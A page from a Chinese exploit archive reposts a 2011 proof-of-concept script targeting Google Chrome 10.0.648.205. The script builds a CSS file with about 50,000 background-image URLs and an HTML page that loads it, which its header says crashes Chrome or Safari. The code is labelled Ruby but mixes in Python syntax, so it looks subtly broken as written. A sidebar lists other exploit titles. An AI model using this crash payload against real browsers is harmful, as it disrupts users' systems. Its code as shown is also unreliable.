首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Google Chrome 10.0.648.205 Stack Overflow
来源:vfocus.net 作者:G0M3S 发布时间:2011-04-20  
#!/usr/bin/ruby
#
#[+]Exploit Title: Google Chrome 10.0.648.205 Stack Overflow Vulnerability
#[+]Date: 17\04\2011
#[+]Author: C4SS!0 G0M3S
#[+]Software Link: http://www.google.com/chrome
#[+]Version: 10.0.648.205
#[+]Teste On: WIN-XP SP3 Brazilian Portuguese
#[+]CVE: N/A
#
#
#
#About:
#
#This is a bug of the Stack Overflow 
#that occurs when the safari or google chrome
#deals with many URLs in the background-image
#only causes a crash does not allow code execution.
#
#

print """

			Created By C4SS!0 G0M3S
			E-mail Louredo_@hotmail.com
			Site www.exploit-br.org
"""
css = """
body
{
background-image:"""
i=0
while i<50000:
	css += "url('imagem.bmp'),"
	i+=1
end
css += "url('imagem.bmp');\n}\n"
print "[+]Creating File style.css...\n"
sleep(1)
begin

f = File.open("style.css","wb")
f.write css
f.close
rescue
print "Error:\n#{$!}\n"
exit
end
print "[+]File Style.css Created With Sucess\n"
sleep(1)
HTML = '''
<html>
<head>

<link rel="stylesheet" type="text/css" href="style.css"></link>

</head>
<body>


</body>
</html>
'''
print "[+]Creating File Exploit.html...\n"
sleep(1)
begin
f = File.open("Exploit.html","wb")
f.write HTML
f.close
rescue
print "Error:\n#{$!}\n"
end
print "[+]File Exploit.html Created With Success\n"
sleep(1)

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·IBM Tivoli Directory Server SA
·Media Player Classic 6.4.9.1 P
·Adobe Flash Player < 10.1.53 .
·Windows Media Player 11 .ogg P
·Wireshark <= 1.4.4 packet-dect
·Wireshark 1.4.1-1.4.4 SEH Over
·docuFORM Mercury WebApp 6.16a/
·FiSH-irssi v0.99 Evil ircd Buf
·Linux/x86 - netcat bindshell p
·MS Word Record Parsing Buffer
·Wireshark <= 1.4.4 packet-dect
·Adobe Flash Player 10.2.153.1
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved